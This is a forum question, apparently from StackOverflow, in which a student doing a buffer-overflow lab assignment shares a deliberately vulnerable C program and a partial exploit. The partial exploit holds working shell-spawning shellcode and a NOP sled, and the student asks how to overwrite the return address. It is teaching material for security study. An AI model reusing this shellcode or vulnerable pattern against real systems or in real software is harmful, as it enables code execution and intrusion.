Databases
StackOverflow2013
Postsdbo
POExploiting a BufferOverflow
Body
 

Note that there are some explanatory texts on larger screens.

plurals
  1. POExploiting a BufferOverflow
    text
    copied!<p>I'm working on a project in which I'm supposed to write a C program to exploit the vulnerability of a given program. </p> <p>Here is the vulnerable C program:</p> <pre><code>#include &lt;stdlib.h&gt; #include &lt;stdio.h&gt; int bof(char *str) { char buffer[12]; strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly\n"); return 1; } </code></pre> <p>And here is the code for exploit:</p> <pre><code>#include &lt;stdlib.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh"/* pushl $0x68732f2f */ "\x68""/bin"/* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&amp;buffer, 0x90, 517); /* Fill the buffer with appropriate contents here */ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); } </code></pre> <p>So, I need to fill the buffer with appropriate contents before saving to the "badfile". I've read a lot about buffer overflows and I guess I need to modify the return address of the vulnerable program. But I really don't know how I'm supposed to do it. Shall I first find the original return address or is there something else that I can do? Also, any ideas/suggestions about how I'm supposed to implement the buffer?</p>
 

Querying!

 
Guidance
An individual column

Larger individual text columns get their own page to allow for proper reading.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload